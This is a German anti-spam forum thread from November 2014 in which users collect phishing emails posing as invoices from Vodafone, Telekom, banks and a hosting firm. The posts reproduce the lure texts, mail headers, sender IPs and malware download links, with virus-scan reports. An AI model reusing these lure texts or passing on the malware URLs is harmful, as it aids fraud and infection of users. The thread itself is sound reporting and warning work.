X-Bounce-Tracking-Info: <MTE4NzU3Mzg7U2VocgkJCWhlbG11dF9zY2h3YXJ6OThAeWFob28uY29tCU1haG51bmcgMjkuMTAuMjAx NAkyNTQJQ2hlY2sJODQ2MQlib3VuY2UJbm8Jbm8=>
Content-type: multipart/alternative; Boundary="--=BOUNDARY_1029953_MSBN_RDYF_CWPL_DDTA"
Content-Length: 4316



Betreff: Mahnung 29.10.2014


Anhang: Rechnung 29.10.2014


Kunde: xxxxxx_xxxxxxxxx [at] yahoo.com





Sehr geehrte/er Kunde!

leider befindet sich seit 14 Tagen eine offene Rechnung mit der Rechnungsnummer: 7143-1 in Ihrem Account mit der Kundennummer 7143. Es handelt sich um 355.76 Euro.

Loggen Sie sich bitte in Ihren Kundenbereich ein und begleichen Sie die Rechnung so schnell wie möglich. Alternativ können Sie auch Ihre Bankdaten für die Lastschrift in Ihren Kundenbereich hinterlegen.

Bitte beachten Sie, sollte Ihre Rechnung nicht innerhalb der nächsten 14 Tage bezahlt werden wird Ihr Account deaktiviert und Ihre Internetadressen werden an die Registrierungsstellen zurück gegeben.

Wir verzichten bei der ersten Erinnerung auf jegliche Mahnkosten, bitte reagieren Sie so schnell wie möglich auf diese Nachricht, bei der zweiten Mahnung entstehen bereits Mahnkosten.

Ihre persönliche Rechnung und Mahnung finden Sie hier: > rechnung_oktober_29.10.2014.pdf




Sollten Sie unsere Bankdaten suchen:

Empfänger: Speicherzentrum GmbH
Bank: BW-Bank
Konto-IBAN: DE67600501010001261790
BIC: SOLADEST
Ihr Team von Speicheranbieter.de

Speicherzentrum GmbH
Bahnhofstr. 24/1
DE - 74321
Bietigheim-Bissingen

Handelsregister: Amtsgericht Stuttgart, HRB 741516
Steuer-ID: [ID filtered]

Inhaber: ***

Telefon: +491805012764 - (40 Cent die Minute) - (Mo-Fr. 9.30 - 18 Uhr)
Fax: +497142788861

Email: support [at] speicheranbieter.de

Ihre persönliche Rechnung und Mahnung finden Sie hier: > rechnung_oktober_29.10.2014.pdf (dabei handelt es sich um eine rechnung_oktober_29.10.2014.exe

Helmi98
29.10.2014, 21:48
Ergänzung zum obigen Beitrag von mir:

http://www.speicheranbieter.de/blog/speicherzentrum-anwalt-gmbh-nicht-von-uns/


die E-Mail von der “Speicherzentrum-Anwalt GmbH” wird nicht von uns verschickt. Hier fälscht jemand den Absender seiner Mail-Header und gibt sich als unser Unternehmen aus. Bitte löschen Sie diese E-Mail uns öffnen Sie keine Anhänge. Hier versucht uns jemand zu schaden.


—–> Update 16:08 Uhr: Wir haben soeben Anzeige erstattet bei der Polizei. Wir wissen ja von welchem Server die Mails verschickt wurden.

——> Update 16:57 Uhr: Der SPAM-Server mit der IP: 109.230.238.187 wurde vom Betreiber des Servers abgeschaltet.

——> Update 17:30 Uhr: Wir haben soeben zusätzlich Meldung beim BKA gemacht.

DJANGO
07.11.2014, 09:57
Spam auf einem meiner gmx-Accounts:

Ihre neue Rechnung als PDF


Ihre Kundennummer: 9573991
07.11.2014
Guten Tag!

Ihre Rechnung vom 07.11.2014 ist hier im Anhang als PDF-Datei für Sie. Falls Sie die Datei auf Ihrem Handy nicht öffnen können, versuchen Sie es bitte an Ihrem PC.

Ihre neue Rechnung als PDF, 9131391_N_91313919_S_91_9.pdf.

Die Gesamtsumme beträgt 391,46 Euro und ist am 17.11.2014 fällig

Jetzt noch übersichtlicher: Ihre Online-Rechnung im neuen Design. Sie finden Ihre Rechnung in MeinVodafone unter Rechnung > Aktuelle Rechnung. Dort können Sie Ihre Rechnung auch als PDF herunterladen und drucken. Ihre Rechnungen der letzten 24 Monate finden Sie unter "Alle Rechnungen".

Viele freundliche Grüße
Ihr Vodafone-Team

Return-Path: inge.leptien [at] junior-systembau.de
Received: from mout-xforward.kundenserver.de ([82.165.159.36]) by mx-ha.gmx.net (mxgmx006) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from localhost (abts-north-static-104.12.160.122.airtelbroadband.in [122.160.12.104]) by mrelayeu.kundenserver.de (node=mreue104) with ESMTP (Nemesis) ID: [ID filtered]
Subject: Ihre Mobilfunk-Rechnung vom 07.11.2014 im Anhang als PDF
From: "Vodafone Service"<inge.leptien [at] junior-systembau.de>
To: ***@gmx.de
X-Mailer: Microsoft Office Outlook 11
X-Copyright: Produced By Microsoft MimeOLE V16.4.3528.331
Mime-version: 1.0
Content-Type: text/html; charset=utf-8
Message-ID: [ID filtered]
Date: Fri, 07 Nov 2014 xx:xx:xx +0100
X-Provags-ID: [ID filtered]
X-UI-Out-Filterresults: junk:10;
Envelope-To: <***@gmx.de>
X-GMX-Antispam: 5 (nemesis mail header analyzer); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: junk:10;V01:K0:vYRWDX87QAY=:HrHIlhN7bA8ttOozX8zNGEQU7yUB xDsXhDPt4bIkjbvC7x03RlCGHODOWEpbZxiMFZXHMUAxYH7tQ6KbBWZIDnvyJLuPdJc6XHevb Guko1EZr05j7DIOaleiiOoXsb3Y2YJzZ/FV5hPzDLOoIGA9bRUiMqliK9xd3WiXJ+hKi6hQsG hAVRqsL4zK95nZOemLDKImPtraV3UjMBHcJ0kAkdm7Epc2/6yzal+kHBDbcPkidGbVJzGKwQG JG1If+5XzIL20VOpTPcjXUN1Vo0xlyUyi8mdA/1+ke50bgaZ6FkyYYMdWT+lto0N1oMHVkzH3 upicOfZpFDc7+wp7CEa9hrBN6GqgZApJr3rx63XzDg6CuQOBsEGISa051NqfmhoW+9jyqiJhC aT1hA8rV6/aOQkxBTOsXqgZKQwNEzmVgDeevZKDyfdZe0sj1jxc/18NIKQPY+OXV6CjNItA5h T54bWl0Fw1iY95sNvtPxKo5bRlXeK1wpbIgxTmsg5yy6aJK53HA1v7ouhEn/rO76rely9HERR PpQpYf1dGs80OycNa5ked4943LBCpQIhpfPaazaMNtE5/6dOj0Hj4RCZXkPFAE1esB0TgXbX2 1L4CGp2BiXC1Qx0oYH4Ocg8zgcw363GAeS42KvSy8EaV8HsMnneZuwd0HEAYS4VZy/kqKnzjL 0kIS0MwU8xEffNsRuB9m7vbCCsDRDorwwJdMsaZre4BCLLiwXNKmHumgqXad8A51AdlVMzMEV PG+EJTZpAY6+MScUZJU6vzo0xWuUsMo0YgVY8gkaknmLRsUUSBEiFFK36yzbPYu7Z6rxh7rf8 00ZHMlS86b4xTLzMvCFVKJVPUbPb1TcfdDJlKLFWt6B+Xy/Gf0Q3Q3C9bFvFD3K8G/wDJzYVx F65YZetIKwO+Bb04mck4iQOf7dGfPKfSuBz3e13CAksrxUHotVwMfZsYh8P6yHiF02bnEHTz8 mGgY/IWVsMCPZ3rQw1jiddNYqIWBU+H2pWZElkX3cjWwAPxCs/6Mz65eir0ao4jTmsbt79OBj Rpo1H4coeeplp1seddCIIGqqLOTVEvg/ArfCnhVhZJDrX7+6SdadQ44Hpw+OSPxPJq0BESiGS T+CTqVGqs3yQ3K0smjLS+9QJlAzkOzQPa7eu0FNv4AtFvvBrx2qoI3L/qDPqYFkerUEAI4IcI FAX8uCj7kUjg3mViz9K/8Kfg19gjXapoy0RDme4kfSsfEzmQwFzC9iabRO52ykqZAI8DkshnV dE5KTAIvcKj2o4KmhBmxhHH2H9MQlK6aAJSx/lwb/QQ6ujrKJPzmDZzMEMNgbT0YTQM/QlKsZ 57JotmxjcKnv6wSARMWpkkIQ/CtUEg4SL9wTd1FXLs52u3aA7I0v4HBCO/RDK0R39yINCHH0m BET/zponKBro7vv9xzIO81VuDg+Mc4wyTr6dPih3QtcrvfMKQBRYEEi7m3zN8fXZOPJ2PtskR USqMwg==

schara56
07.11.2014, 11:39
Passt hierzu (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung).

@Mods
bitte Tackern.

truelife
07.11.2014, 13:42
[x] done

Katzina
07.11.2014, 22:26
Hier aufgeschlagen mit (ungeöffneter) zip-Datei im Anhang - Spammy sendet zeitversetzt :confused:
Mail habe ich an Amazon weitergeleitet.

Offene Rechnung 27.09.2014 Buchungsnummer 51570939 18.03.2005 um 11:16 Uhr
Von:
Stellvertretender Sachbearbeiter

rollerfreak [at] online.de


Return-Path: rollerfreak [at] online.de
Received: from mout.kundenserver.de ([212.227.126.187]) by mx-ha.web.de (mxweb108) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from ANIA (80-238-67-139.internetia.net.pl [80.238.67.139]) by mrelayeu.kundenserver.de (node=mreue001) with ESMTP (Nemesis) ID: [ID filtered]
From: "Stellvertretender Sachbearbeiter" <rollerfreak [at] online.de>
To: xxx<xxx>
Subject: Offene Rechnung 27.09.2014 Buchungsnummer 51570939
Date: Fri, 18 Mar 2005 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_008E_506868AB.310B5E36"
X-Provags-ID: [ID filtered]
X-UI-Out-Filterresults: notjunk:1;
Envelope-To: <xxxx>
X-UI-Filterresults: unknown:5;V01:K0:XMxDF+8v5u8=:2+4H4EhHH3uZSjHttGGvsmTfHq j7yanRi6pbAXcJUG1zK6Itwa0WjXEaw+1lGuK+k6xP1XuR5cYZt6uXliKapRNiKb68WLfsP4A

Mittwoch
08.11.2014, 10:01
Hier aufgeschlagen mit (ungeöffneter) zip-Datei im Anhang - Spammy sendet zeitversetzt :confused:
Kannst ja mal antworten, dass Du die Einrede der Verjährung geltend machst. :clown:

SCNR
Mittwoch

kjz1
10.11.2014, 20:02
Vodafone war heute dran, kein Anhang (selbst dazu ist Viruski zu blöd), aber Download:

Received: from localhost (169.201.broadband9.iol.cz [90.176.201.169]) by mrelayeu.kundenserver.de (node=mreue105) with ESMTP (Nemesis) ID: [ID filtered]


Vodafone Ihre neue Rechnung als PDF

Ihre Kundennummer: 57112957
10.11.2014
Guten Tag!

Ihre Rechnung vom 10.11.2014 ist hier im Anhang als PDF-Datei für Sie.
Falls Sie
die Datei auf Ihrem Handy nicht öffnen können, versuchen Sie es bitte an
Ihrem PC.

Ihre neue Rechnung als PDF, 5761057_G_57610574_P_57_1129.pdf.

http://smartmethode.com/CyGNQ0XLP

Die Gesamtsumme beträgt *357,37 Euro* und ist am 17.11.2014 fällig

*Jetzt noch übersichtlicher:* Ihre Online-Rechnung im neuen Design. Sie
finden
Ihre Rechnung in MeinVodafone unter Rechnung > Aktuelle Rechnung. Dort
können
Sie Ihre Rechnung auch als PDF herunterladen und drucken. Ihre
Rechnungen der
letzten 24 Monate finden Sie unter "Alle Rechnungen".

Viele freundliche Grüße
*Ihr Vodafone-Team*

IP: 192.254.190.68 ---> WEBSITEWELCOME.COM

Als Download: 2014_11rechnung_pdf_vodafone.zip, entpackt: 2014_11rechnung_pdf_vodafone.pdf.exe

und mit Sicherheit Malware:

http://virusscan.jotti.org/de/scanresult/c87b2c046ee9322e059d1ad5d80feebfe58eec90

https://www.virustotal.com/de/file/b603ca01814a96879e9222ed5df917fb9031f0e0a26120a72c12f2067fd8a991/analysis/1415628163/


Received: from mail-proxyout-mua-14.websupport.sk
(mail-proxyout-mua-14.websupport.sk [37.9.172.164])
by xxxxx (Postfix) with ESMTP ID: [ID filtered]
for xxxxx; Mon, 10 Nov 2014 xx:xx:xx +0100 (CET)
Received: from mail-proxyout-mua-14.websupport.sk (localhost [127.0.0.1])
by mua-smtp-cf.websupport.sk (Postfix) with ESMTP ID: [ID filtered]
for xxxxx; Mon, 10 Nov 2014 xx:xx:xx +0100 (CET)
Received: from lb-proxy-14.websupport.sk (unknown [10.10.1.14])
by mail-proxyout-mua-14.websupport.sk (Postfix) with ESMTP ID: [ID filtered]
for xxxxx; Mon, 10 Nov 2014 xx:xx:xx +0100 (CET)
Received: from lb-proxy-14 (localhost [127.0.0.1])
by smtp-cf.websupport.sk (Postfix) with ESMTP ID: [ID filtered]
for xxxxx; Mon, 10 Nov 2014 xx:xx:xx +0100 (CET)
Received: from localhost (unknown [78.176.237.198])
(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
(No client certificate requested)
(Authenticated sender: judasova [at] forlit.cz)
by lb-proxy-14.websupport.sk (Postfix) with ESMTPSA
for xxxxx; Mon, 10 Nov 2014 xx:xx:xx +0100 (CET)


========================================================================
Dies ist eine automatisch generierte E-Mail. Bitte senden Sie keine
Antworten an
diese Absender-Adresse. Bei Fragen zu Produkten oder zu Ihrer Rechnung
bieten
wir Ihnen unter www.vodafone.de/gk-service im Bereich "Kontakt" die
Möglichkeit,
Ihre Anfrage an uns zu richten.
========================================================================

Ihre Rechnungskontonummer: 001917976114

Sehr geehrte Damen und Herren,
Ihre aktuellen Rechnungs- und Einzelverbindungsdaten sofern von Ihnen
beauftragt
liegen vor.
https://www.vodafoneteam.de/rechnung/.

http://bcdabogados.com.ar/sZ5NEKgw6

Der Rechnungsbetrag für den aktuellen Abrechnungszeitraum beträgt:
*111,46 Euro*

Ihre Rechnungen stehen für Sie 13 Monate und Ihre Einzelverbindungsdaten
80 Tage
ab Rechnungsdatum zur Ansicht und Auswertung bereit.

Mit freundlichen Grüßen,
Ihr Vodafone-OnlineRechnung

IP: 200.58.117.82 ---> qatar.dattaweb.com

2014_11rechnung_pdf_vodafone.zip

https://www.virustotal.com/de/file/2670ed05801e03aaff4417d5eaf591aedb953b5cd30d8a98ebcaafd62c3c7488/analysis/

DJANGO
11.11.2014, 13:47
Heute wars die "Sparkassen GmbH":

Von:
Sparkasse GmbH

Sehr geehrte Kundin, sehr geehrter Kunde,

wir freuen uns, dass Ihre Wünsche jetzt in Erfüllung gehen können.

Es wurden Zinsen auf Einlagen in Höhe von 9,4% p.a. berechnet, siehe hier entsprechende Zusatzinfo.
[kam als Link =] Zinsen_in_Höhe_von_9,4%_11. November 2014_xx:xx:xx.


Haben Sie noch Fragen? Dann rufen Sie uns einfach an unter 030 – 694 78 040.

Vielen Dank für Ihr Vertrauen.

Mit freundlichen Grüßen
Return-Path: n.dinter [at] asb-dortmund.de
Received: from smtprelay03.ispgateway.de ([80.67.18.15]) by mx-ha.gmx.net (mxgmx006) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from [79.146.99.210] (helo=localhost) by smtprelay03.ispgateway.de with esmtpa (Exim 4.84) (envelope-from <poor [at] spamvictim.tld>) ID: [ID filtered]
Subject: 11. November 2014 xx:xx:xx (1880357357)
From: "Sparkasse GmbH"<n.dinter [at] asb-dortmund.de>
To: ***@gmx.de
X-Mailer: Microsoft CDO for Windows 2000
X-Copyright: Microsoft Outlook 14.0
Mime-version: 1.0
Content-Type: text/html; charset=utf-8
Message-ID: [ID filtered]
Date: Tue, 11 Nov 2014 xx:xx:xx +0100
X-Df-Sender: bi5kaW50ZXJAYXNiLWRvcnRtdW5kLmRl
Envelope-To: <***@gmx.de>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)

Fake-Telefonrechnung über ca. 300 Euro, dieses Mal von der Telekom, war auch wieder im gmx-Spamordner.

kjz1
11.11.2014, 20:05
Wieder die Vlads:

Received: from localhost (218-183-78-82.static.pitesti.rdsnet.ro [82.78.183.218]) by mrelayeu.kundenserver.de (node=mreue002) with ESMTP (Nemesis) ID: [ID filtered]


========================================================================
Dies ist eine automatisch generierte E-Mail. Bitte senden Sie keine
Antworten an
diese Absender-Adresse. Bei Fragen zu Produkten oder zu Ihrer Rechnung
bieten
wir Ihnen unter www.vodafone.de/gk-service im Bereich "Kontakt" die
Möglichkeit,
Ihre Anfrage an uns zu richten.
========================================================================

Ihre Rechnungskontonummer: 003283740689

Guten Tag,

Ihre aktuellen Rechnungs- und Einzelverbindungsdaten (sofern von Ihnen
beauftragt) liegen vor.
Mobilfunk-Rechnung_für_November_2014_(RG74068-32839).zip

http://vibae.nl/6nN5jVzH2

Der Rechnungsbetrag für den aktuellen Abrechnungszeitraum beträgt:
*468,79 Euro*

Ihre Rechnungen stehen für Sie 13 Monate und Ihre Einzelverbindungsdaten
80 Tage
ab Rechnungsdatum zur Ansicht und Auswertung bereit.

Mit freundlichen Grüßen,

Ihr Vodafone D2

IP: 213.206.228.227 ---> web01.shared.real-websolutions.nl

zum Download: 2014_11rechnung_pdf_vodafone.zip

carkiller08
11.11.2014, 20:41
Received: from mail-in-02.arcor-online.net ([151.189.21.42]) by BAY004-MC3F60.hotmail.com over TLS secured channel with Microsoft SMTPSVC(7.5.7601.22712);
Tue, 11 Nov 2014 xx:xx:xx -0800
Received: from mail-in-14-z2.arcor-online.net (mail-in-14-z2.arcor-online.net [151.189.8.31])
by mx.arcor.de (Postfix) with ESMTP ID: [ID filtered]
for <***>; Tue, 11 Nov 2014 xx:xx:xx +0100 (CET)
Received: from mail-in-16.arcor-online.net (mail-in-16.arcor-online.net [151.189.21.56])
by mail-in-14-z2.arcor-online.net (Postfix) with ESMTP ID: [ID filtered]
for <***>; Tue, 11 Nov 2014 xx:xx:xx +0100 (CET)
Received: from localhost (unknown [199.189.197.10])
(Authenticated sender: wendt-karosseriebau [at] arcor.de)
by mail-in-16.arcor-online.net (Postfix) with ESMTPA ID: [ID filtered]
for <***>; Tue, 11 Nov 2014 xx:xx:xx +0100 (CET)
Subject: 11. November 2014 06:49:** (10086***)
From: "Volksbank"<wendt-karosseriebau [at] arcor.de>



Guten Tag,

wir freuen uns, dass Ihre Wünsche jetzt in Erfüllung gehen können.

Es wurden Zinsen auf Einlagen in Höhe von 8,9% p.a. berechnet, siehe hier entsprechende Zusatzinfo.
Zinsen_in_Höhe_von_8,9%_11. November 2014_xx:xx:xx.zip
http://uicme.com/pTwH45e6Z

Haben Sie noch Fragen? Dann rufen Sie uns einfach an unter 030 – 916 70 090.

Vielen Dank für Ihr Vertrauen.

Mit freundlichen Grüßen

kjz1
11.11.2014, 20:42
Auf die Vlad-Gauner ist Verlaß, die zweite gleich hinterher:

X-CHKRCPT: Envelopesender noch grub2211 [at] mail.utanet.at
Received: from taro.utanet.at (taro.utanet.at [213.90.36.45])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
for xxxxx; Tue, 11 Nov 2014 xx:xx:xx +0100 (CET)
Received: from plenty.xoc.tele2net.at ([213.90.36.8])
by taro.utanet.at with esmtp (Exim 4.80)
(envelope-from <grub2211 [at] mail.utanet.at>)
ID: [ID filtered]
for xxxxx; Tue, 11 Nov 2014 xx:xx:xx +0100
Received: from [88.226.18.15] (helo=localhost)
by plenty.xoc.tele2net.at with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
(Exim 4.80)
(envelope-from <grub2211 [at] mail.utanet.at>)
ID: [ID filtered]
for xxxxx; Tue, 11 Nov 2014 xx:xx:xx +0100

IP: 88.226.18.15 ---> 88.226.18.15.dynamic.ttnet.com.tr

gecrackt: grub2211 [at] mail.utanet.at


========================================================================
Dies ist eine automatisch generierte E-Mail. Bitte senden Sie keine
Antworten an
diese Absender-Adresse. Bei Fragen zu Produkten oder zu Ihrer Rechnung
bieten
wir Ihnen unter www.vodafone.de/gk-service im Bereich "Kontakt" die
Möglichkeit,
Ihre Anfrage an uns zu richten.
========================================================================

Ihre Rechnungskontonummer: 003434669443

Guten Tag,

Ihre aktuellen Rechnungs- und Einzelverbindungsdaten (sofern von Ihnen
beauftragt) liegen vor.
Mobilfunk-Rechnung_für_November_2014_(RG66944-34343).zip

http://benhviemdaitrang.com/SvneYOPmM

Der Rechnungsbetrag für den aktuellen Abrechnungszeitraum beträgt:
*344,33 Euro*

Ihre Rechnungen stehen für Sie 13 Monate und Ihre Einzelverbindungsdaten
80 Tage
ab Rechnungsdatum zur Ansicht und Auswertung bereit.

Mit freundlichen Grüßen,

Ihr Vodafone 0nline

IP: 184.154.68.124 ---> chi10.stablehost.com/SINGLEHOP

2014_11rechnung_pdf_vodafone.zip

Eniac
11.11.2014, 22:31
Return-Path: gulabi [at] areatrans.at
Received: from mout-xforward.kundenserver.de ([82.165.159.5]) by mx-ha.gmx.net
(mxgmx101) with ESMTPS (Nemesis) ID: [ID filtered]
<my.adress [at] gmx.de>; Fri, 07 Nov 2014 xx:xx:xx +0100
Received: from localhost (net-93-64-146-10.cust.vodafonedsl.it [93.64.146.10])
by mrelayeu.kundenserver.de (node=mreue003) with ESMTP (Nemesis)
ID: [ID filtered]
Subject: Ihre Telekom Mobilfunk RechnungOnline Monat November 2014 Nr. 65344249984248
From: "Telekom Deutschland GmbH"<gulabi [at] areatrans.at>
To: poor [at] spamvictim.tld
Mime-version: 1.0
Content-Type: text/html; charset=utf-8
Message-ID: [ID filtered]
Date: Fri, 07 Nov 2014 xx:xx:xx +0100
Envelope-To: <poor [at] spamvictim.tld>


Sehr geehrte Kundin,
sehr geehrter Kunde

Im Anhang finden Sie die gewünschten Dokumente und Daten zu Ihrer Telekom Mobilfunk RechnungOnline für Geschäftskunden vom Monat November,
Download (Ihre Telekom Mobilfunk RechnungOnline für Geschäftskunden 2112921144 vom 07.11.2014 des Kundenkontos 2600211294).

--> http://couturebodyconcepts.com/W93h8xgsO

Mit freundlichen Grüßen,
Geschäftskundenservice

Telekom Deutschland GmbH
Aufsichtsrat: ***
Geschäftsführung: ***
Eintrag: Amtsgericht Bonn, HRB 59 19, Sitz der Gesellschaft Bonn
USt-Id.Nr.: DE 736100801207
WEEE-Reg.-Nr.: 528452612100

Tja, ich bin nich bei der Telekom und schon mal gar nicht deren Geschäftskunde. Der Link versucht eine zip-Datei auf den Rechner zu laden, natürlich malware.


Eniac

DJANGO
13.11.2014, 09:29
Jeden Tag eine neue "Telekom-Rechnung", natürlich wieder bei gmx im Spamordner:

Von:
Telekom Deutschland GmbH {NoReply}
Sehr geehrte Damen und Herren,

Ihre aktuelle Rechnung für Ihre Kundennummer 99438 vom 13.11.2014 steht im PDF-Format für Sie bereit.
Rechnung_2014_11_353630000099438.zip.

In Ihrem Account finden Sie alle Ihre Rechnungen in der Rechnungsübersicht.

Der sofort fällige Gesamtbetrag von EUR 235,84 wird Ihrem Konto in Kürze belastet.

Mit freundlichen Grüßen

Ihre Telekom

Return-Path: m.butzbach [at] vitatherm.de
Received: from mout-xforward.kundenserver.de ([82.165.159.8]) by mx-ha.gmx.net (mxgmx113) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from localhost (LPuteaux-656-01-175-117.w193-251.abo.wanadoo.fr [193.251.76.117]) by mrelayeu.kundenserver.de (node=mreue004) with ESMTP (Nemesis) ID: [ID filtered]
Subject: Rechnung 13.11.2014 (495299)
From: "Telekom Deutschland GmbH {NoReply}"<m.butzbach [at] vitatherm.de>
To: ***@gmx.de
X-Mailer: Apple Mail (2.1283)
X-Copyright: SAP Web Application Server 7.00
Mime-version: 1.0
Content-Type: text/html; charset=utf-8
Message-ID: [ID filtered]
Date: Thu, 13 Nov 2014 xx:xx:xx +0100

Eniac
13.11.2014, 19:53
Return-Path: ml [at] daserlebnisjournal.de
Received: from h1835425.stratoserver.net ([85.214.26.76]) by mx-ha.gmx.net
(mxgmx007) with ESMTPS (Nemesis) ID: [ID filtered]
<my.adress [at] gmx.de>; Thu, 13 Nov 2014 xx:xx:xx +0100
Received: from h1835425.stratoserver.net (localhost [127.0.0.1])
by h1835425.stratoserver.net (Postfix) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Thu, 13 Nov 2014 xx:xx:xx +0100 (CET)
Received: from localhost (LPuteaux-656-01-250-154.w217-128.abo.wanadoo.fr [217.128.249.154])
by h1835425.stratoserver.net (Postfix) with ESMTPSA
for <poor [at] spamvictim.tld>; Thu, 13 Nov 2014 xx:xx:xx +0100 (CET)
Subject: Ihre Festnetz-Rechnung für November 2014
From: "Vodafone <9999-MU3801aBM0 [at] kundenservice.vodafone.de>"<ml [at] daserlebnisjournal.de>
To: poor [at] spamvictim.tld
Mime-version: 1.0
Content-Type: text/html; charset=utf-8
Message-ID: [ID filtered]
Date: Thu, 13 Nov 2014 xx:xx:xx +0100 (CET)
Envelope-To: <poor [at] spamvictim.tld>




Ihre Kundennummer: 226214926

Sehr geehrte Kundin, sehr geehrter Kunde,

anbei erhalten Sie Ihre Rechnung vom 13.11.2014.

13.11.2014_xx:xx:xx_Rechnung_Kundennr_260000226214926.pdf

--> http://sofialondonmoskva.com/BzaMDQ1I

Der Rechnungsbetrag in Höhe von 126,44 EUR wird am 23.11.2014 von Ihrem Konto abgebucht.

Ihre Rechnung ist im PDF-Format erstellt worden. Um sich Ihre Rechnung anschauen zu können, klicken Sie auf den Anhang und es öffnet sich automatisch der Acrobat Reader.


Freundliche Grüße
Ihr Vodafone 0nline


Eniac

kjz1
13.11.2014, 20:02
AFAIK ist das so ähnlich wie die hochseriösen(TM) Affiliate-Leadz. In der schwarzen Szene wird für jeden infizierten PC Provison gezahlt. Virenschleudern im Auftrag gegen Provision...

kjz1
14.11.2014, 08:44
Wieder dieselbe Bande, diesmal via gecrackter Dreckskiste in der Türkei:

Received: from mx05.easyname.com ([77.244.243.9]) by mx-ha.gmx.net (mxgmx103) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from [80.120.84.22] (helo=localhost) by mx.easyname.eu with esmtpsa (TLS1.2:DHE_RSA_AES_256_CBC_SHA256:256) (Exim 4.80) (envelope-from <2020mail14 [at] mx02.easyname.eu>) ID: [ID filtered]

IP: 80.120.84.22 ---> ABH Vermoeg u Verw GmbH


Guten Tag,

Ihre aktuelle Rechnung für Ihre Kundennummer 21906 vom 14.11.2014 steht im
PDF-Format für Sie bereit.
rg_6000682221906-sig.zip

http://janaann.com/p3oeXLvHld

In Ihrem Account finden Sie alle Ihre Rechnungen in der Rechnungsübersicht.

Der sofort fällige Gesamtbetrag von EUR *346,68* wird Ihrem Konto in Kürze
belastet.

Hilfe & Kontakt:
================
Haben Sie Fragen zu Ihrer Rechnung? In unserem Hilfe-Center finden Sie
Antworten
auf die häufigsten Rechnungsfragen unter:

http://www.telekom.de/hilfe-und-service/kundencenter

Gerne sind unsere Mitarbeiter der Rechnungsstelle auch telefonisch für
Sie da.
Sie erreichen uns täglich rund um die Uhr - kostenfrei aus dem Fest- und
Mobilfunknetz der Telekom Leiter Kundenservice - unter:

0721 46 68

Mit freundlichen Grüßen

Ihre Telekom Leiter Kundenservice

IP: 31.210.90.58 ---> server-31.210.90.58.as42926.net/TR-RADORE

Radore.... Immer wieder dieselben Schwarzhüte, die auffällig werden...

kjz1
14.11.2014, 14:24
Dieselbe Bande, diesmal:

Received: from smtp3.mail.fcom.ch (smtp3.mail.fcom.ch [212.60.46.172])
(using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
(No client certificate requested)
by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
for xxxxx; Fri, 14 Nov 2014 xx:xx:xx +0100 (CET)
Received: from localhost (194-166-73-254.adsl.highway.telekom.at
[194.166.73.254])
(Authenticated sender: pfister.ernst [at] ggs.ch)
by smtp3.mail.fcom.ch (Postfix) with ESMTPSA ID: [ID filtered]
for xxxxx; Fri, 14 Nov 2014 xx:xx:xx +0100 (CET)

gecrackt: pfister.ernst [at] ggs.ch

http://taylanbilsay.com/4jBDzL9byJ

IP: 185.71.216.180 ---> 18571216180.static.turkishost.com, TR

kjz1
17.11.2014, 13:59
Wieder dieselben Ganoven:

Received: from confixx.mmc.at ([212.108.35.141]) by mx-ha.gmx.net (mxgmx113)
with ESMTP (Nemesis) ID: [ID filtered]
Nov 2014 xx:xx:xx +0100
Received: from localhost (unknown [212.16.188.245])
by confixx.mmc.at (Postfix) with ESMTPA ID: [ID filtered]
for xxxxx; Mon, 17 Nov 2014 xx:xx:xx +0100 (CET)

gecrackt: web15p8 [at] confixx.mmc.at


Lieber Telekom Kunde,

heute erhalten Sie Ihre Rechnung vom 17.11.2014 mit digitaler Signatur im
PDF-Format.
2014_11_172250000057709_17_225_0000005770.zip

http://autoscreensdirect.co.uk/vkX57NUt

Der sofort fällige Gesamtbetrag von EUR *317,91* wird Ihrem Konto in Kürze
belastet.

Ihre Telekom Deutschland GmbH

IP: 173.254.28.116 ---> just116.justhost.com

https://www.virustotal.com/de/file/b1e18b4d750f5c36714ed96be95662a7dc0f5e9788dde09d75c21cc9d140af18/analysis/


Received: from mo4-p07-ob.smtp.rzone.de (mo4-p07-ob.smtp.rzone.de
[81.169.146.189])
(using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits))
(No client certificate requested)
by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
for xxxxx; Mon, 17 Nov 2014 xx:xx:xx +0100 (CET)
Received: from localhost ([103.242.98.100])
by smtp.strato.de (RZmta 35.11 SBL|AUTH)
with ESMTPSA ID: [ID filtered]
(using TLSv1.2 with cipher DHE-RSA-AES256-GCM-SHA384 (256/256 bits))
(Client dID: [ID filtered]
for xxxxx; Mon, 17 Nov 2014 xx:xx:xx +0100 (CET)

gecrackt: denny.schneider [at] ksb-schwedt.de


Lieber Telekom Kunde,

mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme
im Monat
November 2014 beträgt: *287,17 Euro.*

2014_11rechnung_876120000066581_87_612_0000006658.zip

http://gurbito.com/TY67zMFd

Im Anhang finden Sie die gewünschten Dokumente zu Ihrer Mobilfunk
RechnungOnline für November 2014.

Ihre Telekom Deutschland GmbH

IP: 212.68.36.114 ---> trsunucu15.emikrondns.com, Hosting Internet Hizmetleri Sanayi ve Ticaret Anonim Sirketi, TR

https://www.virustotal.com/de/file/46c38da25e57f7a816b2db553a61a5ced411918292cb9fb450407b657eaf8aa6/analysis/

Verhaltensanalyse:

http://anubis.iseclab.org/?action=result&task_id=1f2913f12a89ad1f4bd3066467520f460&format=html

kjz1
18.11.2014, 11:59
